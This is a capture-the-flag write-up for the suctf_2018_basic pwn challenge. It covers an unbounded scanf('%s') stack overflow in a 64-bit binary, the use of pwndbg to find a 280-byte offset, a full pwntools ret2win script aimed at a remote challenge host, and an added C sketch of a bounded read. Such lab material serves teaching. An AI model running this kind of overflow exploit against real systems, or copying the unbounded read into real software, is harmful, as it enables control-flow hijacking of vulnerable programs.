suctf_2018_basic pwn

Setup


64-bit, NX enabled

Analysis

The main function

int __fastcall main(int argc, const char **argv, const char **envp)
{
char s[268]; // [rsp+10h] [rbp-110h] BYREF
int v5; // [rsp+11Ch] [rbp-4h]

scanf("%s", s);
v5 = strlen(s);
printf("Hi %s\n", s);
return 0;
}

scanf("%s", s) reads user input into s.
scanf with a bare %s does not check the input length, so an input longer than 268 bytes overflows the buffer.
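As an added example (not code from the writeup), the scanf("%s") read from main() is modelled next to a bounded replacement, so the 268-byte boundary can be checked directly. BUF_SZ, a_run and the helper names are my own; the input runs are constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SZ 268          /* char s[268] in the decompiled main() */

static char run_buf[1024];  /* constructed test input */

/* Build an n-byte run of 'A' (constructed input, n < sizeof run_buf). */
const char *a_run(size_t n)
{
    memset(run_buf, 'A', n);
    run_buf[n] = '\0';
    return run_buf;
}

/* Model of the challenge's scanf("%s", s): bytes stored = token length + NUL,
 * decided by the input alone. Scanning into an oversized scratch buffer keeps
 * the model itself in bounds. */
size_t unbounded_store_len(const char *input)
{
    char scratch[1024];
    if (sscanf(input, "%1023s", scratch) != 1)
        return 0;
    return strlen(scratch) + 1;
}

/* Would scanf("%s") write past s? Exactly 268 characters already overflow,
 * because the terminating NUL lands in v5's slot at rbp-4. With s at
 * rbp-0x110, token bytes 0x110..0x117 cover the saved rbp and the next eight
 * the return address: the offset of 280 that cyclic reports below. */
int overflows_s(const char *input)
{
    return unbounded_store_len(input) > BUF_SZ;
}

/* Hardened read: the width caps the token at BUF_SZ-1 characters so the NUL
 * always fits. fgets(s, sizeof s, stdin) is the other usual fix. */
size_t hardened_read(const char *input, char out[BUF_SZ])
{
    if (sscanf(input, "%267s", out) != 1) {  /* 267 == BUF_SZ - 1 */
        out[0] = '\0';
        return 0;
    }
    return strlen(out);
}

size_t hardened_len(const char *input)   /* wrapper returning the kept length */
{
    char out[BUF_SZ];
    return hardened_read(input, out);
}
```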

The callThisFun function (backdoor)

int callThisFun(void)
{
char *path[4]; // [rsp+0h] [rbp-20h] BYREF

path[0] = "/bin/cat";
path[1] = "flag.txt";
path[2] = 0LL;
return execve("/bin/cat", path, 0LL);
}

This directly prints the contents of flag.txt.

Approach

The program has a stack overflow, and callThisFun prints the flag directly, so this is a simple 64-bit stack overflow challenge.
First, find the offset with gdb:

motaly@motaly-VMware-Virtual-Platform:~$ gdb bp
Reading symbols from bp...
(No debugging symbols found in bp)
pwndbg> cyclic 500
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa
pwndbg> r
Starting program: /home/motaly/bp
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa
Hi aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaa�

Program received signal SIGSEGV, Segmentation fault.
0x00000000004011fe in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
──────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────
RAX 0
RBX 0x7fffffffd818 —▸ 0x7fffffffdbf3 ◂— '/home/motaly/bp'
RCX 0
RDX 0
RDI 0x7fffffffd3f0 —▸ 0x7fffffffd420 ◂— 0x6161616168626161 ('aabhaaaa')
RSI 0x4056b0 ◂— 0x6161616161206948 ('Hi aaaaa')
R8 0x7ffff7e03b20 (main_arena+96) —▸ 0x405ab0 ◂— 0
R9 0x410
R10 1
R11 0x202
R12 1
R13 0
R14 0
R15 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
RBP 0x626161616161616a ('jaaaaaab')
RSP 0x7fffffffd6f8 ◂— 0x626161616161616b ('kaaaaaab')
RIP 0x4011fe (main+102) ◂— ret
───────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────
► 0x4011fe <main+102> ret <0x626161616161616b>
────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd6f8 ◂— 0x626161616161616b ('kaaaaaab')
01:0008│ 0x7fffffffd700 ◂— 0x626161616161616c ('laaaaaab')
02:0010│ 0x7fffffffd708 ◂— 0x626161616161616d ('maaaaaab')
03:0018│ 0x7fffffffd710 ◂— 'naaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
04:0020│ 0x7fffffffd718 ◂— 'oaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
05:0028│ 0x7fffffffd720 ◂— 'paaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
06:0030│ 0x7fffffffd728 ◂— 'qaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
07:0038│ 0x7fffffffd730 ◂— 'raaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa'
──────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────
► 0 0x4011fe main+102
1 0x626161616161616b None
2 0x626161616161616c None
3 0x626161616161616d None
4 0x626161616161616e None
5 0x626161616161616f None
6 0x6261616161616170 None
7 0x6261616161616171 None
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l 0x626161616161616b
Finding cyclic pattern of 8 bytes: b'kaaaaaab' (hex: 0x6b61616161616162)
Found at offset 280

The offset is 280.
Next, look up the address of the callThisFun backdoor function in IDA.

The address of callThisFun is 0x401157.
With these two pieces of information, build the payload directly: padding first, then the return address.

flag=0x401157

payload=b'b'*280+p64(flag)
io.sendline(payload)

Script

from pwn import *
context(os='linux',log_level='debug',arch='amd64')
io=remote('node5.buuoj.cn',27967)
# io= process('/home/motaly/bp')
elf=ELF('/home/motaly/bp')

flag=0x401157

payload=b'b'*280+p64(flag)
io.sendline(payload)

io.interactive()